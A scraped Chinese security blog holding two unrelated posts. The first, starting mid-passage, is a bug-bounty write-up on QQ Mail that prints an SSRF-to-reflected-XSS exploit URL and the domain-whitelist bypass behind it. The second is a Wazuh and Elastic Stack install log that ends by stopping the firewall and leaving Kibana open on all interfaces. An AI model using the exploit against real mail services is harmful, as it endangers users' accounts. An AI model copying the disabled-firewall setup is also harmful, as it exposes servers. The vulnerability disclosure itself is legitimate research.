但当第一行是http://www.lagou.com ，第二行的链接都会放行（除去色情或被举报的网址）。

比如：

两个链接都会进行跳转。

如果第一个是http://www.lagou.com ，第二行的网址是一个钓鱼或挂马的链接，却没有被举报。那用户便可能会受到攻击。

后来的结果是大家都知道了，被忽略了。这点我没啥争议，不是漏洞也没关系，我想一探究竟，它是通过js获取邮件内的链接，遇到点击事件就丢到三方“云端url检测”的吗？所以在审计js代码的过程中，一不小心发现了一个类ssrf漏洞。

鸡肋ssrf变身反射型xss

ssrf漏洞

原功能链接：

https://mail.qq.com/cgi-bin/magurl?sid=e6tvxdAtN0XOUGoz&act=rep&url=http://x.soso.com/js/xf/xflib2.0.js

这个cgi读取到了js的内容

漏洞截图：

https://mail.qq.com/cgi-bin/magurl?sid=e6tvxdAtN0XOUGoz&act=rep&url=http://ip.qq.com/

但此ssrf限制了域名，比如.qq.com，.soso.com，等等腾讯自己的域名。所以除非你能再挖到腾讯自己的域名下的漏洞来结合使用。可是我们还可以测试一下是否可以绕过域名的白名单机制。

反射型xss漏洞

于是我构造了如下的url，成功绕过了白名单，提交了此漏洞：

构造的恶意链接：
http://mail.qq.com.pirogue.org/qq.com.html
内容如下：
Exp:
https://mail.qq.com/cgi-bin/magurl?sid=e6tvxdAtN0XOUGoz&act=rep&url=http://mail.qq.com.pirogue.org/qq.com.html

仔细看url链接里面存在一个sid，在后来的tsrc自测时发现，此sid只能是收件人的sid才能触发漏洞。额，有点self-xss的意思咯。但tsrc还是根据可能的危害程度，给了漏洞中危的回复。

结语

之前在搞一个目标的时候还挖到了一个QQ企业邮箱的存储型xss，但那个存储型xss没啥技术含量，而这个反射的起因到结果还是挺有趣的，所以迫不及待的想分享给大家。

Wazuh搭建

2017-08-24T11:21:38.000Z

WAZUH架构图

分布式

单台部署

Install Wazuh server

添加CentOS wazuh源

$ cat > /etc/yum.repos.d/wazuh.repo <<\EOF
[wazuh_repo]
gpgcheck=1
gpgkey=https://packages.wazuh.com/key/GPG-KEY-WAZUH
enabled=1
name=CentOS-$releasever - Wazuh
baseurl=https://packages.wazuh.com/yum/el/$releasever/$basearch
protect=1
EOF

安装Wazuh-manager

1	$ yum install wazuh-manager

查看Wazuh运行状态

[root@localhost init.d]# service wazuh-manager status
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted is running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
wazuh-modulesd is running...

安装Wazuh API

安装NodeJS

[root@localhost opt]# curl –silent –location https://rpm.nodesource.com/setup_6.x | bash -

## Installing the NodeSource Node.js 6.x repo...


## Inspecting system...

+ rpm -q --whatprovides redhat-release || rpm -q --whatprovides centos-release || rpm -q --whatprovides cloudlinux-release || rpm -q --whatprovides sl-release
+ uname -m

## Confirming "el6-x86_64" is supported...

+ curl -sLf -o /dev/null 'https://rpm.nodesource.com/pub_6.x/el/6/x86_64/nodesource-release-el6-1.noarch.rpm'

## Downloading release setup RPM...

+ mktemp
+ curl -sL -o '/tmp/tmp.l3Z6OzvS3W' 'https://rpm.nodesource.com/pub_6.x/el/6/x86_64/nodesource-release-el6-1.noarch.rpm'

## Installing release setup RPM...

+ rpm -i --nosignature --force '/tmp/tmp.l3Z6OzvS3W'

## Cleaning up...

+ rm -f '/tmp/tmp.l3Z6OzvS3W'

## Checking for existing installations...

+ rpm -qa 'node|npm' | grep -v nodesource

## Run `yum install -y nodejs` (as root) to install Node.js 6.x and npm.
## You may also need development tools to build native addons:
##   `yum install -y gcc-c++ make`

[root@localhost opt]# ls
[root@localhost opt]# yum install nodejs

已加载插件：fastestmirror
设置安装进程
Loading mirror speeds from cached hostfile
 * base: mirrors.aliyun.com
 * extras: mirrors.aliyun.com
 * updates: mirrors.aliyun.com
nodesource                                                                                                                         | 2.5 kB     00:00     
nodesource/primary_db                                                                                                              |  43 kB     00:00     
解决依赖关系
--> 执行事务检查
---> Package nodejs.x86_64 2:6.11.1-1nodesource.el6 will be 安装
--> 完成依赖关系计算

依赖关系解决

==========================================================================================================================================================
 软件包                         架构                           版本                                              仓库                                大小
==========================================================================================================================================================
正在安装:
 nodejs                         x86_64                         2:6.11.1-1nodesource.el6                          nodesource                         9.5 M

事务概要
==========================================================================================================================================================
Install       1 Package(s)

总下载量：9.5 M
Installed size: 33 M
确定吗？[y/N]：y
下载软件包：
nodejs-6.11.1-1nodesource.el6.x86_64.rpm                                                                                           | 9.5 MB     00:20     
warning: rpmts_HdrFromFdno: Header V4 RSA/SHA1 Signature, key ID 34fa74dd: NOKEY
Retrieving key from file:///etc/pki/rpm-gpg/NODESOURCE-GPG-SIGNING-KEY-EL
Importing GPG key 0x34FA74DD:
 Userid : NodeSource 
 Package: nodesource-release-el6-1.noarch (installed)
 From   : /etc/pki/rpm-gpg/NODESOURCE-GPG-SIGNING-KEY-EL
确定吗？[y/N]：y
运行 rpm_check_debug 
执行事务测试
事务测试成功
执行事务
Warning: RPMDB altered outside of yum.
  正在安装   : 2:nodejs-6.11.1-1nodesource.el6.x86_64                                                                                                 1/1 
  Verifying  : 2:nodejs-6.11.1-1nodesource.el6.x86_64                                                                                                 1/1 

已安装:
  nodejs.x86_64 2:6.11.1-1nodesource.el6                                                                                                                  

完毕！

安装Wazuh API

[root@localhost opt]# yum install wazuh-api

已加载插件：fastestmirror
设置安装进程
Loading mirror speeds from cached hostfile
 * base: mirrors.aliyun.com
 * extras: mirrors.aliyun.com
 * updates: mirrors.aliyun.com
解决依赖关系
--> 执行事务检查
---> Package wazuh-api.x86_64 0:2.0.1-1.el6 will be 安装
--> 完成依赖关系计算

依赖关系解决

==========================================================================================================================================================
 软件包                              架构                             版本                                     仓库                                  大小
==========================================================================================================================================================
正在安装:
 wazuh-api                           x86_64                           2.0.1-1.el6                              wazuh_repo                           2.0 M

事务概要
==========================================================================================================================================================
Install       1 Package(s)

总下载量：2.0 M
Installed size: 7.8 M
确定吗？[y/N]：y
下载软件包：
wazuh-api-2.0.1-1.el6.x86_64.rpm                                                                                                   | 2.0 MB     00:04     
运行 rpm_check_debug 
执行事务测试
事务测试成功
执行事务
  正在安装   : wazuh-api-2.0.1-1.el6.x86_64                                                                                                           1/1 
Installing for SysVinit
WAZUH-API is not running.
WAZUH-API started.
Don't forget to run the configuration script after installation: /var/ossec/api/scripts/configure_api.sh
Warning: Minimal supported version is 2.7
root     21160  5.0  0.2 614120  7952 pts/0    Rl+  15:12   0:00 /usr/bin/node /var/ossec/api/app.js
WAZUH-API stopped.
WAZUH-API started.
  Verifying  : wazuh-api-2.0.1-1.el6.x86_64                                                                                                           1/1 

已安装:
  wazuh-api.x86_64 0:2.0.1-1.el6                                                                                                                          

完毕！

wazuh-api状态错误

[root@localhost Python-2.7.3]# service wazuh-api status
WAZUH-API is stopped.

Last 20 log entries:
WazuhAPI 2017-08-01 15:12:23: ERROR: No suitable Python version found. This application requires Python 2.7 or newer. Exiting.

Full log: /var/ossec/logs/api.log

Cent0S 6安装python27

1 2	$ yum install -y centos-release-scl $ yum install -y python27

查看wazuh-api状态

[root@localhost Python-2.7.3]# service wazuh-api start
WAZUH-API started.
[root@localhost Python-2.7.3]# service wazuh-api status
WAZUH-API is running.

安装 Filebeat

[root@localhost opt]# rpm --import https://packages.elastic.co/GPG-KEY-elasticsearch
[root@localhost opt]# cat > /etc/yum.repos.d/elastic.repo << EOF
> [elastic-5.x]
> name=Elastic repository for 5.x packages
> baseurl=https://artifacts.elastic.co/packages/5.x/yum
> gpgcheck=1
> gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
> enabled=1
> autorefresh=1
> type=rpm-md
> EOF

[root@localhost opt]# yum install filebeat

已加载插件：fastestmirror
设置安装进程
Loading mirror speeds from cached hostfile
 * base: mirrors.aliyun.com
 * extras: mirrors.aliyun.com
 * updates: mirrors.aliyun.com
elastic-5.x                                                                                                                        | 1.3 kB     00:00     
elastic-5.x/primary                                                                                                                |  81 kB     00:00     
elastic-5.x                                                                                                                                       206/206
解决依赖关系
--> 执行事务检查
---> Package filebeat.x86_64 0:5.5.1-1 will be 安装
--> 完成依赖关系计算

依赖关系解决

==========================================================================================================================================================
 软件包                              架构                              版本                                  仓库                                    大小
==========================================================================================================================================================
正在安装:
 filebeat                            x86_64                            5.5.1-1                               elastic-5.x                            8.7 M

事务概要
==========================================================================================================================================================
Install       1 Package(s)

总下载量：8.7 M
Installed size: 29 M
确定吗？[y/N]：y
下载软件包：
filebeat-5.5.1-x86_64.rpm                                                                                                          | 8.7 MB     06:35     
运行 rpm_check_debug 
执行事务测试
事务测试成功
执行事务
  正在安装   : filebeat-5.5.1-1.x86_64                                                                                                                1/1 
  Verifying  : filebeat-5.5.1-1.x86_64                                                                                                                1/1 

已安装:
  filebeat.x86_64 0:5.5.1-1                                                                                                                               

完毕！

下载Filebeat配置文件

[root@localhost opt]# curl -so /etc/filebeat/filebeat.yml https://raw.githubusercontent.com/wazuh/wazuh/2.0/extensions/filebeat/filebeat.yml
[root@localhost opt]# ls /etc/file
filebeat/    filesystems  
[root@localhost opt]# ls /etc/filebeat/filebeat.
filebeat.full.yml            filebeat.template-es2x.json  filebeat.template-es6x.json  filebeat.template.json       filebeat.yml
[root@localhost opt]# ls /etc/filebeat/filebeat.
filebeat.full.yml            filebeat.template-es2x.json  filebeat.template-es6x.json  filebeat.template.json       filebeat.yml
[root@localhost opt]# ls /etc/filebeat/filebeat.yml 
/etc/filebeat/filebeat.yml
[root@localhost opt]# cat /etc/filebeat/filebeat.yml 
filebeat:
 prospectors:
  - input_type: log
    paths:
     - "/var/ossec/logs/alerts/alerts.json"
    document_type: json
    json.message_key: log
    json.keys_under_root: true
    json.overwrite_keys: true

output:
 logstash:
   # The Logstash hosts
   hosts: ["YOUR_ELASTIC_SERVER_IP:5000"]
#   ssl:
#     certificate_authorities: ["/etc/filebeat/logstash.crt"]

修改elastic_server_ip

[root@localhost opt]# vi /etc/filebeat/filebeat.yml

filebeat:
 prospectors:
  - input_type: log
    paths:
     - "/var/ossec/logs/alerts/alerts.json"
    document_type: json
    json.message_key: log
    json.keys_under_root: true
    json.overwrite_keys: true

output:
 logstash:
   # The Logstash hosts
   hosts: ["192.168.1.43:5000"]
#   ssl:
#     certificate_authorities: ["/etc/filebeat/logstash.crt"]

添加Filebeat服务并启动

[root@localhost opt]# chkconfig --add filebeat
[root@localhost opt]# service filebeat start
Starting filebeat: 2017/08/01 10:06:00.996092 beat.go:285: INFO Home path: [/usr/share/filebeat] Config path: [/etc/filebeat] Data path: [/var/lib/filebeat] Logs path: [/var/log/filebeat]
2017/08/01 10:06:00.996210 beat.go:186: INFO Setup Beat: filebeat; Version: 5.5.1
2017/08/01 10:06:00.996254 metrics.go:23: INFO Metrics logging every 30s
2017/08/01 10:06:00.996500 logstash.go:90: INFO Max Retries set to: 3
2017/08/01 10:06:00.996763 outputs.go:108: INFO Activated logstash as output plugin.
2017/08/01 10:06:00.997506 publish.go:295: INFO Publisher name: localhost.localdomain
2017/08/01 10:06:01.008432 async.go:63: INFO Flush Interval set to: 1s
2017/08/01 10:06:01.008471 async.go:64: INFO Max Bulk Size set to: 2048
Config OK
                                                           [确定]

Install Elastic Stack

安装 Java JRE (Logstash和Elasticsearch必要的依赖)

[root@localhost ~]# cd /opt/
[root@localhost opt]# ls
[root@localhost opt]# curl -Lo jre-8-linux-x64.rpm --header "Cookie: oraclelicense=accept-securebackup-cookie" "http://download.oracle.com/otn-pub/java/jdk/8u144-b01/090f390dda5b47b9b721c7dfaa008135/jre-8u144-linux-x64.rpm"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 56.4M  100 56.4M    0     0  20.1M      0  0:00:02  0:00:02 --:--:-- 23.3M
[root@localhost opt]# ll
总用量 57832
-rw-r--r--. 1 root root 59219102 8月  22 14:45 jre-8-linux-x64.rpm
[root@localhost opt]# rpm -qlp jre-8-linux-x64.rpm > /dev/null 2>&1 && echo "Java package downloaded successfully" || echo "Java package did not download successfully"
Java package downloaded successfully
[root@localhost opt]# yum install jre-8-linux-x64.rpm
已加载插件：fastestmirror
设置安装进程
诊断 jre-8-linux-x64.rpm: jre1.8.0_144-1.8.0_144-fcs.x86_64
jre-8-linux-x64.rpm 将被安装
base                                                                                                                     | 3.7 kB     00:00     
base/primary_db                                                                                                          | 4.7 MB     00:00     
extras                                                                                                                   | 3.4 kB     00:00     
extras/primary_db                                                                                                        |  29 kB     00:01     
updates                                                                                                                  | 3.4 kB     00:00     
updates/primary_db                                                                                                       | 2.5 MB     00:05     
解决依赖关系
--> 执行事务检查
---> Package jre1.8.0_144.x86_64 0:1.8.0_144-fcs will be 安装
--> 完成依赖关系计算

依赖关系解决

================================================================================================================================================
 软件包                            架构                        版本                                 仓库                                   大小
================================================================================================================================================
正在安装:
 jre1.8.0_144                      x86_64                      1.8.0_144-fcs                        /jre-8-linux-x64                      133 M

事务概要
================================================================================================================================================
Install       1 Package(s)

总文件大小：133 M
Installed size: 133 M
确定吗？[y/N]：y
下载软件包：
运行 rpm_check_debug 
执行事务测试
事务测试成功
执行事务
  正在安装   : jre1.8.0_144-1.8.0_144-fcs.x86_64                                                                                            1/1 
Unpacking JAR files...
  plugin.jar...
  javaws.jar...
  deploy.jar...
  rt.jar...
  jsse.jar...
  charsets.jar...
  localedata.jar...
  Verifying  : jre1.8.0_144-1.8.0_144-fcs.x86_64                                                                                            1/1 

已安装:
  jre1.8.0_144.x86_64 0:1.8.0_144-fcs                                                                                                           

完毕！
[root@localhost opt]# rm jre-8-linux-x64.rpm
rm：是否删除普通文件 "jre-8-linux-x64.rpm"？y
[root@localhost opt]# ls
[root@localhost opt]# rpm --import https://packages.elastic.co/GPG-KEY-elasticsearch
[root@localhost opt]# ls
[root@localhost opt]# cat > /etc/yum.repos.d/elastic.repo << EOF
> [elastic-5.x]
> name=Elastic repository for 5.x packages
> baseurl=https://artifacts.elastic.co/packages/5.x/yum
> gpgcheck=1
> gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
> enabled=1
> autorefresh=1
> type=rpm-md
> EOF

安装elasticsearch

[root@localhost opt]# yum install elasticsearch
已加载插件：fastestmirror
设置安装进程
Determining fastest mirrors
 * base: mirrors.btte.net
 * extras: mirrors.tuna.tsinghua.edu.cn
 * updates: mirror.bit.edu.cn
elastic-5.x                                                                                                              | 1.3 kB     00:00     
elastic-5.x/primary                                                                                                      |  86 kB     00:00     
elastic-5.x                                                                                                                             218/218
解决依赖关系
--> 执行事务检查
---> Package elasticsearch.noarch 0:5.5.2-1 will be 安装
--> 完成依赖关系计算

依赖关系解决

================================================================================================================================================
 软件包                                架构                           版本                            仓库                                 大小
================================================================================================================================================
正在安装:
 elasticsearch                         noarch                         5.5.2-1                         elastic-5.x                          32 M

事务概要
================================================================================================================================================
Install       1 Package(s)

总下载量：32 M
Installed size: 36 M
确定吗？[y/N]：y
下载软件包：
elasticsearch-5.5.2.rpm                                                                                                  |  32 MB     09:03     
运行 rpm_check_debug 
执行事务测试
事务测试成功
执行事务
Creating elasticsearch group... OK
Creating elasticsearch user... OK
  正在安装   : elasticsearch-5.5.2-1.noarch                                                                                                 1/1 
### NOT starting on installation, please execute the following statements to configure elasticsearch service to start automatically using chkconfig
 sudo chkconfig --add elasticsearch
### You can start elasticsearch service by executing
 sudo service elasticsearch start
  Verifying  : elasticsearch-5.5.2-1.noarch                                                                                                 1/1 

已安装:
  elasticsearch.noarch 0:5.5.2-1                                                                                                                

完毕！
[root@localhost opt]# chkconfig --add elasticsearch
[root@localhost opt]# service elasticsearch start
正在启动 elasticsearch：                                   [确定]
[root@localhost opt]# curl https://raw.githubusercontent.com/wazuh/wazuh-kibana-app/master/server/startup/integration_files/template_file.json | curl -XPUT 'http://localhost:9200/_template/wazuh' -H 'Content-Type: application/json' -d @-
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 15547  100 15547    0     0  16125      0 --:--:-- --:--:-- --:--:-- 40592
{"acknowledged":true}[root@localhost opt]# ls
[root@localhost opt]# ls
[root@localhost opt]# curl https://raw.githubusercontent.com/wazuh/wazuh-kibana-app/master/server/startup/integration_files/alert_sample.json | curl -XPUT "http://localhost:9200/wazuh-alerts-"`date +%Y.%m.%d`"/wazuh/sample" -H 'Content-Type: application/json' -d @-
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
102  1432  102  1432    0     0   1567      0 --:--:-- --:--:-- --:--:--  4937
{"_index":"wazuh-alerts-2017.08.22","_type":"wazuh","_id":"sample","_version":1,"result":"created","_shards":{"total":2,"successful":1,"failed":0},"created":true}[root@localhost opt]# 
[root@localhost opt]#

It is recommended to edit the default configuration to improve the Elasticsearch performance. To do so, please see Elasticsearch tuning.https://documentation.wazuh.com/current/installation-guide/optional-configurations/elastic-tuning.html#elastic-tuning

安装Logstash

Logstash is the tool that will collect, parse, and forward to Elasticsearch for indexing and storage all logs generated by Wazuh server. For more info please see Logstash.https://www.elastic.co/products/logstash

[root@localhost opt]# yum install logstash
已加载插件：fastestmirror
设置安装进程
Loading mirror speeds from cached hostfile
 * base: mirrors.btte.net
 * extras: mirrors.tuna.tsinghua.edu.cn
 * updates: mirror.bit.edu.cn
解决依赖关系
--> 执行事务检查
---> Package logstash.noarch 1:5.5.2-1 will be 安装
--> 完成依赖关系计算

依赖关系解决

================================================================================================================================================
 软件包                           架构                           版本                                 仓库                                 大小
================================================================================================================================================
正在安装:
 logstash                         noarch                         1:5.5.2-1                            elastic-5.x                          90 M

事务概要
================================================================================================================================================
Install       1 Package(s)

总下载量：90 M
Installed size: 169 M
确定吗？[y/N]：y
下载软件包：
logstash-5.5.2.rpm                                                                                                       |  90 MB     33:26     
运行 rpm_check_debug 
执行事务测试
事务测试成功
执行事务
  正在安装   : 1:logstash-5.5.2-1.noarch                                                                                                    1/1 
Using provided startup.options file: /etc/logstash/startup.options
Successfully created system startup script for Logstash
  Verifying  : 1:logstash-5.5.2-1.noarch                                                                                                    1/1 

已安装:
  logstash.noarch 1:5.5.2-1                                                                                                                     

完毕！
[root@localhost opt]# curl -so /etc/logstash/conf.d/01-wazuh.conf https://raw.githubusercontent.com/wazuh/wazuh/2.0/extensions/logstash/01-wazuh.conf
[root@localhost opt]# curl -so /etc/logstash/wazuh-elastic5-template.json https://raw.githubusercontent.com/wazuh/wazuh/2.0/extensions/elasticsearch/wazuh-elastic5-template.json
[root@localhost opt]# /usr/share/logstash/bin/system-install 
Successfully created system startup script for Logstash
[root@localhost opt]# chkconfig --add logstash
在 logstash 服务中读取信息时出错：没有那个文件或目录
[root@localhost opt]# ls /etc/init.d/
auditd         functions      iptables       killall        netconsole     postfix        rsyslog        single         
crond          halt           jexec          mdmonitor      netfs          rdisc          sandbox        sshd           
elasticsearch  ip6tables      kdump          messagebus     network        restorecond    saslauthd      udev-post      
[root@localhost opt]# /usr/share/logstash/bin/system-install /etc/logstash/startup.options sysv
Using provided startup.options file: /etc/logstash/startup.options
Manually creating startup for specified platform: sysv
Successfully created system startup script for Logstash
[root@localhost opt]# chkconfig --add logstash
[root@localhost opt]# service logstash start
logstash started

Setting up SSL for Filebeat and Logstash

因为Wazuh server和Elastic Stack server是分布式架构，要配置在Filebeat和Logstash之间配SSL加密。

1	[root@localhost opt]# cp /etc/pki/tls/openssl.cnf custom_openssl.cnf

vi custom_openssl.cnf
找到[ v3_ca ]字段，然后在它下面添加一行elastic server的ip地址：

1 2	[ v3_ca ] subjectAltName = IP: 192.168.106.43

[root@localhost opt]# openssl req -x509 -batch -nodes -days 3650 -newkey rsa:2048 -keyout /etc/logstash/logstash.key -out /etc/logstash/logstash.crt -config custom_openssl.cnf
Generating a 2048 bit RSA private key
.................+++
.....+++
writing new private key to '/etc/logstash/logstash.key'
-----
[root@localhost opt]# rm custom_openssl.cnf 
rm：是否删除普通文件 "custom_openssl.cnf"？y

配置Logstash server，这时在服务器中应该有了/etc/logstash/logstash.crt 证书和 /etc/logstash/logstash.key秘钥。

vi /etc/logstash/conf.d/01-wazuh.conf
把
input {
    beats {
        port => 5000
        codec => "json_lines"
#        ssl => true
#        ssl_certificate => "/etc/logstash/logstash.crt"
#        ssl_key => "/etc/logstash/logstash.key"
    }
}

改成
input {
    beats {
        port => 5000
        codec => "json_lines"
        ssl => true
        ssl_certificate => "/etc/logstash/logstash.crt"
        ssl_key => "/etc/logstash/logstash.key"
    }
}

1
2
3

重启logstash
[root@localhost opt]# service logstash restart
logstash started

配置Filebeat

现在我们配置filebeat认证logstash服务器认证。
使用scp命令必须两台服务器都安装openssh-clients，yum -y install openssh-clients要在两台服务器上分别执行。

[root@localhost ~]# yum -y install openssh-clients
已加载插件：fastestmirror
设置安装进程
Loading mirror speeds from cached hostfile
 * base: mirrors.aliyun.com
 * extras: mirrors.aliyun.com
 * updates: mirrors.aliyun.com
解决依赖关系
--> 执行事务检查
---> Package openssh-clients.x86_64 0:5.3p1-122.el6 will be 安装
--> 处理依赖关系 openssh = 5.3p1-122.el6，它被软件包 openssh-clients-5.3p1-122.el6.x86_64 需要
--> 处理依赖关系 libedit.so.0()(64bit)，它被软件包 openssh-clients-5.3p1-122.el6.x86_64 需要
--> 执行事务检查
---> Package libedit.x86_64 0:2.11-4.20080712cvs.1.el6 will be 安装
---> Package openssh.x86_64 0:5.3p1-111.el6 will be 升级
--> 处理依赖关系 openssh = 5.3p1-111.el6，它被软件包 openssh-server-5.3p1-111.el6.x86_64 需要
---> Package openssh.x86_64 0:5.3p1-122.el6 will be an update
--> 执行事务检查
---> Package openssh-server.x86_64 0:5.3p1-111.el6 will be 升级
---> Package openssh-server.x86_64 0:5.3p1-122.el6 will be an update
--> 完成依赖关系计算

依赖关系解决

================================================================================================================================================
 软件包                               架构                        版本                                          仓库                       大小
================================================================================================================================================
正在安装:
 openssh-clients                      x86_64                      5.3p1-122.el6                                 base                      443 k
为依赖而安装:
 libedit                              x86_64                      2.11-4.20080712cvs.1.el6                      base                       74 k
为依赖而更新:
 openssh                              x86_64                      5.3p1-122.el6                                 base                      277 k
 openssh-server                       x86_64                      5.3p1-122.el6                                 base                      329 k

事务概要
================================================================================================================================================
Install       2 Package(s)
Upgrade       2 Package(s)

总下载量：1.1 M
下载软件包：
(1/4): libedit-2.11-4.20080712cvs.1.el6.x86_64.rpm                                                                       |  74 kB     00:00     
(2/4): openssh-5.3p1-122.el6.x86_64.rpm                                                                                  | 277 kB     00:00     
(3/4): openssh-clients-5.3p1-122.el6.x86_64.rpm                                                                          | 443 kB     00:00     
(4/4): openssh-server-5.3p1-122.el6.x86_64.rpm                                                                           | 329 kB     00:00     
------------------------------------------------------------------------------------------------------------------------------------------------
总计                                                                                                            414 kB/s | 1.1 MB     00:02     
运行 rpm_check_debug 
执行事务测试
事务测试成功
执行事务
  正在升级   : openssh-5.3p1-122.el6.x86_64                                                                                                 1/6 
  正在安装   : libedit-2.11-4.20080712cvs.1.el6.x86_64                                                                                      2/6 
  正在安装   : openssh-clients-5.3p1-122.el6.x86_64                                                                                         3/6 
  正在升级   : openssh-server-5.3p1-122.el6.x86_64                                                                                          4/6 
  清理       : openssh-server-5.3p1-111.el6.x86_64                                                                                          5/6 
  清理       : openssh-5.3p1-111.el6.x86_64                                                                                                 6/6 
  Verifying  : openssh-server-5.3p1-122.el6.x86_64                                                                                          1/6 
  Verifying  : libedit-2.11-4.20080712cvs.1.el6.x86_64                                                                                      2/6 
  Verifying  : openssh-5.3p1-122.el6.x86_64                                                                                                 3/6 
  Verifying  : openssh-clients-5.3p1-122.el6.x86_64                                                                                         4/6 
  Verifying  : openssh-5.3p1-111.el6.x86_64                                                                                                 5/6 
  Verifying  : openssh-server-5.3p1-111.el6.x86_64                                                                                          6/6 

已安装:
  openssh-clients.x86_64 0:5.3p1-122.el6                                                                                                        

作为依赖被安装:
  libedit.x86_64 0:2.11-4.20080712cvs.1.el6                                                                                                     

作为依赖被升级:
  openssh.x86_64 0:5.3p1-122.el6                                      openssh-server.x86_64 0:5.3p1-122.el6                                     

完毕！

以下内容在filebeat服务端，也就是wazuh server上执行。

1
2
3

[root@localhost ~]# scp root@192.168.106.43:/etc/logstash/logstash.crt /etc/filebeat
root@192.168.106.43's password: 
logstash.crt

vi /etc/filebeat/filebeat.yml

修改
output:
 logstash:
   # The Logstash hosts
   hosts: ["192.168.106.43:5000"]
#   ssl:
#     certificate_authorities: ["/etc/filebeat/logstash.crt"]

变成
output:
 logstash:
   hosts: ["192.168.106.43:5000"]
   ssl:
     certificate_authorities: ["/etc/filebeat/logstash.crt"]

重新启动filebeat

[root@localhost ~]# service filebeat restart
2017/08/23 03:36:41.485699 beat.go:285: INFO Home path: [/usr/share/filebeat] Config path: [/etc/filebeat] Data path: [/var/lib/filebeat] Logs path: [/var/log/filebeat]
2017/08/23 03:36:41.485822 beat.go:186: INFO Setup Beat: filebeat; Version: 5.5.1
2017/08/23 03:36:41.485956 metrics.go:23: INFO Metrics logging every 30s
2017/08/23 03:36:41.488062 logstash.go:90: INFO Max Retries set to: 3
2017/08/23 03:36:41.488281 outputs.go:108: INFO Activated logstash as output plugin.
2017/08/23 03:36:41.489904 publish.go:295: INFO Publisher name: localhost.localdomain
2017/08/23 03:36:41.508442 async.go:63: INFO Flush Interval set to: 1s
2017/08/23 03:36:41.508504 async.go:64: INFO Max Bulk Size set to: 2048
Config OK
Stopping filebeat:                                         [确定]
Starting filebeat: 2017/08/23 03:36:41.654868 beat.go:285: INFO Home path: [/usr/share/filebeat] Config path: [/etc/filebeat] Data path: [/var/lib/filebeat] Logs path: [/var/log/filebeat]
2017/08/23 03:36:41.654971 beat.go:186: INFO Setup Beat: filebeat; Version: 5.5.1
2017/08/23 03:36:41.655207 metrics.go:23: INFO Metrics logging every 30s
2017/08/23 03:36:41.656127 logstash.go:90: INFO Max Retries set to: 3
2017/08/23 03:36:41.656311 outputs.go:108: INFO Activated logstash as output plugin.
2017/08/23 03:36:41.656522 publish.go:295: INFO Publisher name: localhost.localdomain
2017/08/23 03:36:41.657083 async.go:63: INFO Flush Interval set to: 1s
2017/08/23 03:36:41.657125 async.go:64: INFO Max Bulk Size set to: 2048
Config OK
                                                           [确定]

安装Kibana

[root@localhost opt]# yum install kibana
已加载插件：fastestmirror
设置安装进程
Loading mirror speeds from cached hostfile
 * base: mirror.bit.edu.cn
 * extras: mirror.bit.edu.cn
 * updates: mirror.bit.edu.cn
解决依赖关系
--> 执行事务检查
---> Package kibana.x86_64 0:5.5.2-1 will be 安装
--> 完成依赖关系计算

依赖关系解决

================================================================================================================================================
 软件包                          架构                            版本                                仓库                                  大小
================================================================================================================================================
正在安装:
 kibana                          x86_64                          5.5.2-1                             elastic-5.x                           50 M

事务概要
================================================================================================================================================
Install       1 Package(s)

总下载量：50 M
Installed size: 191 M
确定吗？[y/N]：y
下载软件包：
kibana-5.5.2-x86_64.rpm                                                                                                  |  50 MB     16:47     
运行 rpm_check_debug 
执行事务测试
事务测试成功
执行事务
  正在安装   : kibana-5.5.2-1.x86_64                                                                                                        1/1 
  Verifying  : kibana-5.5.2-1.x86_64                                                                                                        1/1 

已安装:
  kibana.x86_64 0:5.5.2-1                                                                                                                       

完毕！
[root@localhost opt]# /usr/share/kibana/bin/kibana-plugin install https://packages.wazuh.com/wazuhapp/wazuhapp.zip
Attempting to transfer from https://packages.wazuh.com/wazuhapp/wazuhapp.zip
Transferring 24560704 bytes....................
Transfer complete
Retrieving metadata from plugin archive
Extracting plugin archive
Extraction complete
Optimizing and caching browser bundles...
Plugin installation complete

vi /etc/kibana/kibana.yml

把
#server.host: "localhost"

改成
server.host: "0.0.0.0"

It is recommended to set up an Nginx proxy for Kibana in order to use SSL encryption and to enable authentication. Instructions to set the proxy up can be found at Setting up SSL and authentication for Kibana.https://documentation.wazuh.com/current/installation-guide/optional-configurations/kibana_ssl.html#kibana-ssl

重启kibana

1
2
3

[root@localhost opt]# chkconfig --add kibana
[root@localhost opt]# service kibana start
kibana started

通过API连接Wazuh App

通过192.168.106.43:5601访问 Kibana，无法访问，查看本地端口已经监听在0.0.0.0:5601，所以关闭防火墙。

[root@localhost opt]# netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:5601                0.0.0.0:*                   LISTEN      27473/node          
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      27360/sshd          
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      5748/master         
tcp        0      0 ::ffff:127.0.0.1:9200       :::*                        LISTEN      26585/java          
tcp        0      0 ::1:9200                    :::*                        LISTEN      26585/java          
tcp        0      0 ::ffff:127.0.0.1:9300       :::*                        LISTEN      26585/java          
tcp        0      0 ::1:9300                    :::*                        LISTEN      26585/java          
tcp        0      0 :::22                       :::*                        LISTEN      27360/sshd          
tcp        0      0 ::1:25                      :::*                        LISTEN      5748/master         
[root@localhost opt]# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  anywhere             anywhere            state RELATED,ESTABLISHED 
ACCEPT     icmp --  anywhere             anywhere            
ACCEPT     all  --  anywhere             anywhere            
ACCEPT     tcp  --  anywhere             anywhere            state NEW tcp dpt:ssh 
REJECT     all  --  anywhere             anywhere            reject-with icmp-host-prohibited 

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
REJECT     all  --  anywhere             anywhere            reject-with icmp-host-prohibited 

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
[root@localhost opt]# service iptables stop
iptables：将链设置为政策 ACCEPT：filter                    [确定]
iptables：清除防火墙规则：                                 [确定]
iptables：正在卸载模块：                                   [确定]

